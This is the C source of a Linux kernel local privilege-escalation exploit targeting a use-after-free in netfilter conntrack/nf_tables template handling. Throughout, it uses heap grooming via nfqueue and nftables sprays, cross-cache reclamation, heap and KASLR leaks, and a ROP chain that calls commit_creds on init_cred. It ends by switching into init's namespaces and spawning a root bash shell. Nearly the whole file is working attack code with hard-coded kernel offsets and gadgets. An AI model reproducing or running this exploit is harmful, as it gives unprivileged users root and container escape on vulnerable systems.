#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "./helpers.h" #include "./helpers_nfqueue.h" #define NFT_NOTRACK_OPS 0x1d430a0 #define INIT_NSPROXY 0x2876900 #define COMMIT_CREDS 0x01d4400 #define FIND_TASK_BY_VPID 0x01cab70 #define SWITCH_TASK_NAMESPACES 0x01d2880 #define KPTI_TRAMPOLINE 0x01401190 + 54 // swapgs_restore_regs_and_return_to_usermode + offset #define INIT_CRED 0x2876b40 #define PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F 0x0a5b286 // push rsi ; xchg bx, ax ; jmp QWORD PTR [rsi+0xf] #define POP_RSP_R13_R14_R15_RET 0x01f1afb // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff8125d450 (smp_call_function_single_async) -> ret #define POP_RDI_RET 0x00dd45d // pop rdi ; ret #define POP_RSI_RET 0x026d67e // pop rsi ; ret #define POP_RDX_RET 0x0228ce2 // pop rdx ; ret #define MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET 0x0e4620d // mov rdi, rax ; mov rax, rdi ; pop rbx ; jmp 0xffffffff82605040 (__x86_return_thunk) -> ret #define UDP_PORT 56789 #define QUEUE_NUM 2 // This enum is used by queue points to determine which packet should be queued. 
enum signal_for_queue {
    SIGNAL_SPRAY,               // queue spray packet
    SIGNAL_PERCPU_TMPL_NF_CONN, // queue percpu nf_conn packet
    SIGNAL_TMP_TMPL_NF_CONN     // queue temporary template nf_conn packet
};

#define UDP_HEADER_SIZE 8
#define SLAB_CHUNK_SIZE_256 256
#define IPS_CONFIRMED_BIT 3

// CROSS CACHE PARAMS
#define OBJ_PER_SLAB_256 16
#define CPU_PARTIALS_SLABS_256 7
#define MIN_PARTIAL_256 5
#define CROSS_CACHE_DEFRAGMENTATION_SIZE 200
#define CROSS_CACHE_PRE_PRE_SIZE (OBJ_PER_SLAB_256 * (1 + MIN_PARTIAL_256))
#define CROSS_CACHE_PRE_SIZE (OBJ_PER_SLAB_256)
#define CROSS_CACHE_POST_SIZE (OBJ_PER_SLAB_256 - 1)
#define CROSS_CACHE_POST_POST_SIZE (OBJ_PER_SLAB_256 * (1 + CPU_PARTIALS_SLABS_256))

// Each array stores the netfilter-queue packet ids returned by alloc_nf_conn() for one spray stage.
int spray_cross_cache_defragment[CROSS_CACHE_DEFRAGMENTATION_SIZE];
int spray_cross_cache_pre_pre[CROSS_CACHE_PRE_PRE_SIZE];
int spray_cross_cache_pre[CROSS_CACHE_PRE_SIZE];
int spray_cross_cache_post[CROSS_CACHE_POST_SIZE];
int spray_cross_cache_post_post[CROSS_CACHE_POST_POST_SIZE];

// SPRAY PARAMS
#define SPRAY_BATCHES 32
#define SPRAY_NOT_STRESS_BATCHES 4 // use this instead of SPRAY_BATCHES when the cache has only a few freed chunks
#define SPRAY_BATCH_SIZE 32

// SIZE AND OFFSETS
#define NFT_RULE_SIZE 0x18
#define NFT_EXPR_SIZE 0x8
#define NFT_LOG_SIZE 0x18
#define NFT_USERDATA_OFFS_DATA sizeof(struct nft_userdata)
#define NF_CONN_OFFS_CT_GENERAL 0x0
#define NF_CONN_OFFS_CT_STATUS 0x80
#define NF_CONN_OFFS_CT_NET 0x88
#define NF_CONN_OFFS_NAT_BYSOURCE 0x90
#define NF_CONN_OFFS_EXT 0xb0
#define NET_OFFS_CT 0x9c0
#define NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB 0x10
#define NFT_EXPR_OPS_OFFS_DEACTIVATE 0x28

// nf_ct_ext
#define NF_CT_EXT_NUM 9
#define NF_CT_EXT_LABELS 7

// Userspace copy of the extension header layout; only offset[NF_CT_EXT_LABELS], len and gen_id are written by this file.
struct nf_ct_ext {
    uint8_t offset[NF_CT_EXT_NUM];
    uint8_t len;
    unsigned int gen_id;
    char data[];
};

#define BATCH_BUFFER_SIZE 1048576 // 1M buffer should be enough
#define NUMBER_OF_NOTRACK_EXPRS 13 // Use 13 notrack expressions as padding to align nft_log.prefix with the UAF write offset.
#define FAKE_EXT_OFFSET (SLAB_CHUNK_SIZE_256 - sizeof(struct nf_ct_ext)) // offset of the fake nf_ct_ext inside chunk 256, place fake ext at the bottom of chunk 256, right before adj nft_rule #define JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE 0xc8 // offset 0xc8 of nft_rule <=> expr->ops->deactivate sock nlsock; const uint16_t family = NFPROTO_IPV4; uint64_t user_cs, user_ss, user_rflags, user_sp; uint64_t leaked_first_tmpl_nf_conn_addr = 0, vmlinux = 0; char buf[0xffff]; // general purpose buf // id of the packet in netfilter queue uint32_t packet_id_first_nf_conn; uint32_t packet_id_second_nf_conn; // handle of the nft_rule that re-use the memmory dangling in nf_nat_bysource list (original owned by the first nf_conn) uint64_t rule_handle_first_nf_conn; const char base_table[] = "base_table"; const char table_spray_name[] = "table_spray_name"; const char chain_spray_name[] = "chain_spray_name"; void save_state() { __asm__(".intel_syntax noprefix;" "mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ".att_syntax;"); } void after_privesc_as_root() { INFO("Returned to userland"); setns(open("/proc/1/ns/mnt", O_RDONLY), 0); setns(open("/proc/1/ns/pid", O_RDONLY), 0); setns(open("/proc/1/ns/net", O_RDONLY), 0); char *args[] = {"/bin/bash", "-i", NULL}; execve(args[0], args, NULL); } void write_to_file(const char *which, const char *format, ...) 
{ FILE *fu = fopen(which, "w"); va_list args; va_start(args, format); if (vfprintf(fu, format, args) < 0) { ERROR("cannot write"); exit(1); } fclose(fu); } int loopback_up() { struct ifreq ifr; int sockfd; // Create a socket to perform ioctl operations sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) { perror("Socket creation failed"); return 1; } // Specify the interface name ("lo" for loopback) strncpy(ifr.ifr_name, "lo", IFNAMSIZ); // Get the current flags for the interface if (ioctl(sockfd, SIOCGIFFLAGS, &ifr) < 0) { perror("Failed to get interface flags"); close(sockfd); return 1; } // Set the IFF_UP flag to bring the interface up ifr.ifr_flags |= IFF_UP; // Apply the new flags to the interface if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) { perror("Failed to set interface flags"); close(sockfd); return 1; } INFO("Loopback interface 'lo' is now up."); close(sockfd); return 0; } int setup(void) { uid_t uid = getuid(); gid_t gid = getgid(); // In order to use nf_tables, we need CAP_NET_ADMIN INFO("Setting up user namespace"); if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) { ERROR("unshare(CLONE_NEWUSER | CLONE_NEWNET)"); return -1; } INFO("Pinning process to CPU #0"); cpu_set_t set; CPU_ZERO(&set); CPU_SET(0, &set); if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) { ERROR("sched_setaffinity"); return -1; } // now we map uid and gid write_to_file("/proc/self/uid_map", "0 %d 1", uid); // deny setgroups (see user_namespaces(7)) write_to_file("/proc/self/setgroups", "deny"); // remap gid write_to_file("/proc/self/gid_map", "0 %d 1", gid); loopback_up(); return 0; } int setup_nft_base_table() { table t = make_table(base_table, family, NULL, 0); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_table(b, t, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } int vuln_setup() { char c_pre_conntrack_name[] = "pre_conntrack_chain"; char c_post_conntrack_name[] = "post_conntrack_chain"; chain c_pre_conntrack = make_chain(base_table, 
c_pre_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK - 1, NULL); expr e_notrack = make_notrack_expr(); rule r_pre_conntrack = make_rule(base_table, c_pre_conntrack_name, &e_notrack, 1, NULL, 0, 0); chain c_post_conntrack = make_chain(base_table, c_post_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK + 1, NULL); expr e_ct_set_zone = make_ct_set_zone_expr(NFT_REG32_00); rule r_post_conntrack = make_rule(base_table, c_post_conntrack_name, &e_ct_set_zone, 1, NULL, 0, 0); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_chain(b, c_pre_conntrack, family); batch_new_chain(b, c_post_conntrack, family); batch_new_rule(b, r_pre_conntrack, family); batch_new_rule(b, r_post_conntrack, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } int register_base_nat_chain() { // The hooknum can be any valid Netfilter hook chain c_nat = make_chain(base_table, "nat_chain", 0, NF_INET_POST_ROUTING, 0, "nat"); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_chain(b, c_nat, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } // Register a chain with a rule that queues packets based on the first byte of their payload int register_conditional_queue_point(char *chain_name, uint32_t hooknum, uint32_t prio, uint8_t byte_to_compare) { chain c = make_chain(base_table, chain_name, 0, hooknum, prio, NULL); expr e_payload = make_payload_expr(NFT_PAYLOAD_TRANSPORT_HEADER, UDP_HEADER_SIZE, 1, NFT_REG32_00); expr e_cmp = make_cmp_expr(NFT_REG32_00, NFT_CMP_EQ, byte_to_compare); expr e_queue = make_queue_expr(QUEUE_NUM, 0, 0); expr list_e[3] = {e_payload, e_cmp, e_queue}; rule r = make_rule(base_table, chain_name, list_e, ARRAY_SIZE(list_e), NULL, 0, 0); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_chain(b, c, family); batch_new_rule(b, r, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } void update_labels_to_overwrites_ops() { char buf[MNL_SOCKET_BUFFER_SIZE]; struct nlmsghdr *nlh; struct nlattr *nest; 
// Release the packet from the "nf_conn_queue_point_2" queue point. nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, QUEUE_NUM); nfq_nlmsg_verdict_put(nlh, packet_id_second_nf_conn, NF_ACCEPT); uint64_t adj_nft_rule_addr = leaked_first_tmpl_nf_conn_addr + SLAB_CHUNK_SIZE_256; uint64_t fake_ops_addr = adj_nft_rule_addr + JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_EXPR_OPS_OFFS_DEACTIVATE; uint64_t orig_ops_addr = vmlinux + NFT_NOTRACK_OPS; uint8_t cta_labels[16] = {0}; uint8_t cta_masks[16] = {0}; *(uint64_t *)&cta_labels[0x0] = fake_ops_addr ^ orig_ops_addr; nest = mnl_attr_nest_start(nlh, NFQA_CT); mnl_attr_put(nlh, CTA_LABELS, 16, cta_labels); mnl_attr_put(nlh, CTA_LABELS_MASK, 16, cta_masks); mnl_attr_nest_end(nlh, nest); if (mnl_socket_sendto(nlsock_queue, nlh, nlh->nlmsg_len) < 0) { perror("mnl_socket_send"); exit(EXIT_FAILURE); } // This packet will be stopped at "nf_conn_queue_point_3". Keep it alive to avoid potential errors from it being freed. } void send_udp_packet(uint8_t first_byte) { int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); struct sockaddr_in addr; addr.sin_family = AF_INET; addr.sin_port = htons(UDP_PORT); addr.sin_addr.s_addr = inet_addr("127.0.0.1"); sendto(sock, &first_byte, 1, 0, (struct sockaddr *)&addr, sizeof(addr)); close(sock); } int setup_chain_to_spray_nft_rule() { table t_spray = make_table(table_spray_name, family, NULL, 0); chain c_spray = make_chain(table_spray_name, chain_spray_name, 0, -1, 0, NULL); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_new_table(b, t_spray, family); batch_new_chain(b, c_spray, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } int alloc_nf_conn() { // send a packet to alloc a temporary template nf_conn in the function `nft_ct_set_zone_eval()` // this template nf_conn stays alive until the user sends a DROP verdict to drop the packet send_udp_packet(SIGNAL_SPRAY); int id_in_queue = queue_recv(queue_get_id_cb); // recv the packet at "before_nat_chain" queue point return 
id_in_queue; } #define FIRST_SPRAY_MIN_RULE_HANDLE 2 // handle for rule used to spray start from 2 #define FIRST_SPRAY_MAX_RULE_HANDLE (SPRAY_BATCHES * SPRAY_BATCH_SIZE + FIRST_SPRAY_MIN_RULE_HANDLE - 1) int dump_exprs(const struct nlmsghdr *nlh, void *data) { rule r = nftnl_rule_alloc(); nftnl_rule_nlmsg_parse(nlh, r); struct nftnl_expr_iter *iter = nftnl_expr_iter_create(r); // Skip notrack exprs for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++) nftnl_expr_iter_next(iter); // Retrieve the content of the prefix field const char *leaked = nftnl_expr_get_str(nftnl_expr_iter_next(iter), NFTNL_EXPR_LOG_PREFIX); if (leaked) { leaked_first_tmpl_nf_conn_addr = (*(uint64_t *)leaked) - NF_CONN_OFFS_NAT_BYSOURCE; INFO("Heap address of the first tmpl nf_conn addr: 0x%lx", leaked_first_tmpl_nf_conn_addr); } nftnl_expr_iter_destroy(iter); nftnl_rule_free(r); return MNL_CB_OK; } int leak_heap_first_tmpl_nf_conn() { char buf[MNL_SOCKET_BUFFER_SIZE]; rule r; nlmsghdr hdr; // One of these rules contains the overwritten prefix. By dumping the prefix field, we leak the heap address of the chunk used by the first template nf_conn. for (uint64_t handle = FIRST_SPRAY_MIN_RULE_HANDLE; handle <= FIRST_SPRAY_MAX_RULE_HANDLE; handle++) { r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle); rseq = seq; hdr = dump_rule(r, buf, family); nftnl_rule_free(r); if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) { ERROR("mnl_socket_sendto"); return -1; } if (run_callbacks(nlsock, dump_exprs, NULL) < 0) { ERROR("run_callbacks leak_heap: primitive"); return -1; } if (leaked_first_tmpl_nf_conn_addr) { rule_handle_first_nf_conn = handle; // Save the handle of the rule that reclaimed the freed chunk. 
return 0; } } return -1; } int queue_leak_kaslr_cb(const struct nlmsghdr *nlh, void *data) { struct nfqnl_msg_packet_hdr *ph = NULL; char *ct_ext; struct nlattr *attr[NFQA_MAX + 1] = {}; if (nfq_nlmsg_parse(nlh, attr) < 0) { perror("problems parsing"); return MNL_CB_ERROR; } ph = mnl_attr_get_payload(attr[NFQA_PACKET_HDR]); ct_ext = mnl_attr_get_payload(attr[NFQA_CT]); packet_id_second_nf_conn = ntohl(ph->packet_id); // 0x4c is the offset of the labels data inside the received payload. // Use a hard-coded offset to quickly retrieve the value. vmlinux = *(uint64_t *)&ct_ext[0x4c] - NFT_NOTRACK_OPS; INFO("Leaked vmlinux: 0x%lx", vmlinux); return MNL_CB_OK; } int leak_kaslr() { // The second template nf_conn is now completely under attacker control. // Release the packet from the "nf_conn_queue_point_1" queue point. nfq_send_verdict(QUEUE_NUM, packet_id_second_nf_conn, NF_ACCEPT); INFO("Try to recv, if exploit gets stuck here, the cross-cache likely didn't hit and the packet was dropped"); queue_recv(queue_leak_kaslr_cb); // recv the packet from "nf_conn_queue_point_2" queue point return 0; } int spray_nft_tables_udata_kmalloc_cg_256_fake_ext() { int table_spray_counter = 0; char udata[SLAB_CHUNK_SIZE_256] = {0}; struct nf_ct_ext *fake_nf_ct_ext = (struct nf_ct_ext *)&udata[FAKE_EXT_OFFSET]; fake_nf_ct_ext->offset[NF_CT_EXT_LABELS] = sizeof(struct nf_ct_ext) + NFT_RULE_SIZE; // => labels's offset points to notrack ops inside adjacent nft_rule fake_nf_ct_ext->len = 0; fake_nf_ct_ext->gen_id = 0; for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; ++i) { batch b = batch_init(BATCH_BUFFER_SIZE); for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) { char table_name[32]; sprintf(table_name, "tsrp-1-%d", table_spray_counter++); table t = make_table(table_name, family, udata, sizeof(udata)); batch_new_table(b, t, family); nftnl_table_free(t); } if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0) return -1; } return 0; } int del_target_rule(uint32_t handle) { rule r = 
make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle); batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_del_rule(b, r, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } int update_adjacent_nft_rule_udata_with_ROP() { // The only way to update the udata of an nft_rule is to free the rule and spray again. // 1. Free adjacent nft_rule // Calculate the handle range for the adj nft_rules int32_t lower_bound_adj_rule_handle = rule_handle_first_nf_conn - (OBJ_PER_SLAB_256 - 1); lower_bound_adj_rule_handle = lower_bound_adj_rule_handle < FIRST_SPRAY_MIN_RULE_HANDLE ? FIRST_SPRAY_MIN_RULE_HANDLE : lower_bound_adj_rule_handle; int32_t upper_bound_adj_rule_handle = rule_handle_first_nf_conn + (OBJ_PER_SLAB_256 - 1); upper_bound_adj_rule_handle = upper_bound_adj_rule_handle > FIRST_SPRAY_MAX_RULE_HANDLE ? FIRST_SPRAY_MAX_RULE_HANDLE : upper_bound_adj_rule_handle; for (int32_t handle = lower_bound_adj_rule_handle; handle <= upper_bound_adj_rule_handle; handle++) { if (handle == rule_handle_first_nf_conn) continue; del_target_rule(handle); } // @sleep(kernel_func="nft_commit_release", // desc="wait for adjacent nft_rule to be freed") usleep(100 * 1000); // 2. Spray nft_rules with udata containing the ROP chain. 
const size_t udata_len = SLAB_CHUNK_SIZE_256 - NFT_RULE_SIZE - NFT_EXPR_SIZE - sizeof(struct nft_userdata); char udata[udata_len]; memset(udata, 0, udata_len); // the jop gadget jumps to [rsi + 0xf] so we put the stack pivot gadget there *(uint64_t *)&udata[0xf - NFT_EXPR_SIZE] = vmlinux + POP_RSP_R13_R14_R15_RET; uint64_t *rop = (uint64_t *)&udata[0x10]; // commit_creds(&init_cred) *rop++ = vmlinux + POP_RDI_RET; *rop++ = vmlinux + INIT_CRED; *rop++ = vmlinux + COMMIT_CREDS; // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) *rop++ = vmlinux + POP_RDI_RET; *rop++ = 1; *rop++ = vmlinux + FIND_TASK_BY_VPID; *rop++ = vmlinux + MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET; *rop++ = 0; *rop++ = vmlinux + POP_RSI_RET; *rop++ = vmlinux + INIT_NSPROXY; *rop++ = vmlinux + SWITCH_TASK_NAMESPACES; // return to userspace *rop++ = vmlinux + KPTI_TRAMPOLINE; rop++; rop++; *rop++ = (uint64_t)after_privesc_as_root; *rop++ = user_cs; *rop++ = user_rflags; *rop++ = user_sp; *rop++ = user_ss; // jop gadget, put here because this space is unused. rsi is pointing to fake_expr // we can use either of the following, they are equivalent *rop++ = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F; // or #define NFT_RULE_OFFS_NFT_USERDATA (NFT_RULE_SIZE + NFT_EXPR_SIZE) *(uint64_t *)&udata[JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_RULE_OFFS_NFT_USERDATA] = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F; // It’s okay to comment out either one of the two. expr e_notrack = make_notrack_expr(); // The ops of this notrack expression will be overwritten later. // Because data in struct nft_userdata starts at offset 1, we send udata from offset 1 to keep everything aligned. 
rule r = make_rule(table_spray_name, chain_spray_name, &e_notrack, 1, &((struct nft_userdata *)&udata)->data, sizeof(udata) - NFT_USERDATA_OFFS_DATA, 0); for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; i++) { batch b = batch_init(BATCH_BUFFER_SIZE); for (int j = 0; j < SPRAY_BATCH_SIZE; j++) { batch_new_rule(b, r, family); } if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0) return -1; } return 0; } int spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn() { int table_spray_counter = 0; char fake_nf_conn[256] = {0}; *(uint32_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_GENERAL]) = 1; // set refcnt = 1 // set status = CONFIRMED to skip function `__nf_conntrack_update()` in `nf_conntrack_update()`. flow: nfqnl_recv_verdict()->nfqnl_reinject()->nf_conntrack_update() *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_STATUS]) = 1 << IPS_CONFIRMED_BIT; // prevents null deref at line `rcu_access_pointer(net->ct.nf_conntrack_event_cb)` in `nf_conntrack_event_cache()` // Just needs to be set to a valid memory address (e.g., leaked_first_tmpl_nf_conn_addr). *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_NET]) = leaked_first_tmpl_nf_conn_addr - (NET_OFFS_CT + NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB); // Set ext to point to the fake nf_ct_ext we placed at the bottom of the leaked address chunk. 
*(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_EXT]) = leaked_first_tmpl_nf_conn_addr + FAKE_EXT_OFFSET; for (int i = 0; i < SPRAY_BATCHES; ++i) { batch b = batch_init(BATCH_BUFFER_SIZE); for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) { char table_name[32]; sprintf(table_name, "tsrp-2-%d", table_spray_counter++); table t = make_table(table_name, family, fake_nf_conn, sizeof(fake_nf_conn)); batch_new_table(b, t, family); nftnl_table_free(t); } if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0) return -1; } return 0; } int escalate() { batch b; rule del_rule = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, 0); b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); batch_del_rule(b, del_rule, family); return batch_send_and_run_callbacks(b, nlsock, NULL); } void spray_cross_cache_pre_alloc() { // 1. DEFRAG kmalloc-256 for (int i = 0; i < CROSS_CACHE_DEFRAGMENTATION_SIZE; i++) { spray_cross_cache_defragment[i] = alloc_nf_conn(); } // 2. pre pre allocate for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) { spray_cross_cache_pre_pre[i] = alloc_nf_conn(); } // 3. pre allocate for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) { spray_cross_cache_pre[i] = alloc_nf_conn(); } } // alloc target between spray_cross_cache_pre_alloc() and spray_cross_cache_post_alloc() void spray_cross_cache_post_alloc() { // 5. post allocate for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) { spray_cross_cache_post[i] = alloc_nf_conn(); } // 6. post post allocate for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) { spray_cross_cache_post_post[i] = alloc_nf_conn(); } } void cross_cache_pre_free() { // 7. pre pre free for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) { nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre_pre[i], NF_DROP); } // 8. pre free for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) { nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre[i], NF_DROP); } } // free target between cross_cache_pre_free() and cross_cache_post_free() void cross_cache_post_free() { // 9. 
post free for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) { nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post[i], NF_DROP); } // 11. post post free for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) { nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post_post[i], NF_DROP); } } int spray_nft_rule_kmalloc_cg_256() { const int number_of_exprs = NUMBER_OF_NOTRACK_EXPRS + 1; // + 1 for nft_log expression int udata_size = SLAB_CHUNK_SIZE_256; // craft a rule in cache 256 udata_size -= NFT_RULE_SIZE; udata_size -= NFT_EXPR_SIZE * number_of_exprs; // this rule contains NUMBER_OF_NOTRACK_EXPRS expressions, notrack expression doesn't have private data. udata_size -= NFT_LOG_SIZE; // nft_log expression has private data udata_size -= sizeof(struct nft_userdata); char udata[udata_size]; memset(udata, 0, udata_size); expr list_e[number_of_exprs]; // notrack exprs are used as padding for nft_log for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++) { list_e[i] = make_notrack_expr(); } expr e_log = make_log_expr(NULL); list_e[number_of_exprs - 1] = e_log; // nft_log.prefix field is located at offset 0x98 of nft_rule. It matches the offset of the uaf write. rule r = make_rule(table_spray_name, chain_spray_name, list_e, ARRAY_SIZE(list_e), udata, sizeof(udata), 0); for (int i = 0; i < SPRAY_BATCHES; i++) { batch b = batch_init(BATCH_BUFFER_SIZE); for (int j = 0; j < SPRAY_BATCH_SIZE; j++) { batch_new_rule(b, r, family); } if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0) return -1; } return 0; } int setup_netfilter() { INFO("Creating netfilter netlink socket"); if ((nlsock = mnl_socket_open(NETLINK_NETFILTER)) == NULL) { ERROR("mnl_socket_open(): nlsock"); return -1; } if (mnl_socket_bind(nlsock, 0, MNL_SOCKET_AUTOPID) < 0) { ERROR("mnl_socket_bind"); return -1; } setup_nf_queue(); setup_nft_base_table(); vuln_setup(); // "before_nat_chain" queue point blocks spray packets entering base NAT chain while keeping them alive. 
register_conditional_queue_point("before_nat_chain", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC - 1, SIGNAL_SPRAY); register_base_nat_chain(); // The "nf_conn_queue_point_*" queue point queues two sk_buffs with temporary template nf_conns used to interact with the vulnerability. register_conditional_queue_point("nf_conn_queue_point_1", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 1, SIGNAL_TMP_TMPL_NF_CONN); register_conditional_queue_point("nf_conn_queue_point_2", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 2, SIGNAL_TMP_TMPL_NF_CONN); register_conditional_queue_point("nf_conn_queue_point_3", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 3, SIGNAL_TMP_TMPL_NF_CONN); // "after_nf_confirm" queue point is used to keep the sk_buff with percpu template nf_conn of nft_ct_zone_eval() alive, allows us to use the temporary nf_conn of nft_ct_zone_eval(). // Note: We can't queue a sk_buff containing an unconfirmed nf_conn with refcount greater than 1, read nf_ct_drop_unconfirmed(). // Register this queue point after `nf_confirm()` function. register_conditional_queue_point("after_nf_confirm", NF_INET_PRE_ROUTING, NF_IP_PRI_FIRST, SIGNAL_PERCPU_TMPL_NF_CONN); setup_chain_to_spray_nft_rule(); return 0; } int main() { save_state(); if (setup() == -1) return -1; setup_netfilter(); send_udp_packet(SIGNAL_PERCPU_TMPL_NF_CONN); // attach per-cpu template nf_conn to this packet queue_recv(NULL); // recv the packet from "after_nf_confirm" queue point. Keeping this packet alive keeps the per-CPU template busy, allowing us to use a temporary template nf_conn. 
INFO("I: CROSS CACHE: kmalloc-256 (struct nf_conn) -> kmalloc-cg-256 (struct nft_rule)"); spray_cross_cache_pre_alloc(); INFO("Allocate the first template nf_conn + link it to nf_nat_bysource"); send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN); // attach temporary template nf_conn to this packet packet_id_first_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point spray_cross_cache_post_alloc(); cross_cache_pre_free(); INFO("Drop the packet with the first template nf_conn, leaving a dangling pointer in nf_nat_bysource hash table"); nfq_send_verdict(QUEUE_NUM, packet_id_first_nf_conn, NF_DROP); cross_cache_post_free(); INFO("Reclaim the first template nf_conn (kmalloc-256) with nft_rule (kmalloc-cg-256)"); spray_nft_rule_kmalloc_cg_256(); INFO("I: end CROSS CACHE"); INFO("II: CROSS CACHE: kmalloc-256 (nf_conn) -> kmalloc-cg-256 (nft_tables->udata)"); spray_cross_cache_pre_alloc(); INFO("Allocate second template nf_conn + link it to nf_nat_bysource => trigger uaf write"); send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN); packet_id_second_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point leak_heap_first_tmpl_nf_conn(); spray_cross_cache_post_alloc(); cross_cache_pre_free(); // Deleting the nft_rule triggers nft_log_destroy(), which frees nft_log.prefix, currently pointing to the middle of the second template nf_conn. 
INFO("Free nft_rule => free second template nf_conn"); del_target_rule(rule_handle_first_nf_conn); // @sleep(kernel_func="nft_commit_release", // desc="wait for victim rule to be freed") usleep(100 * 1000); INFO("Reclaim freed nft_rule (kmalloc-cg-256) with nft_table.udata (kmalloc-cg-256)"); spray_nft_tables_udata_kmalloc_cg_256_fake_ext(); cross_cache_post_free(); INFO("Reclaim the second template nf_conn (kmalloc-256) with nft_table.udata (kmalloc-cg-256)"); spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn(); INFO("II: end CROSS CACHE"); leak_kaslr(); update_adjacent_nft_rule_udata_with_ROP(); update_labels_to_overwrites_ops(); escalate(); return 0; }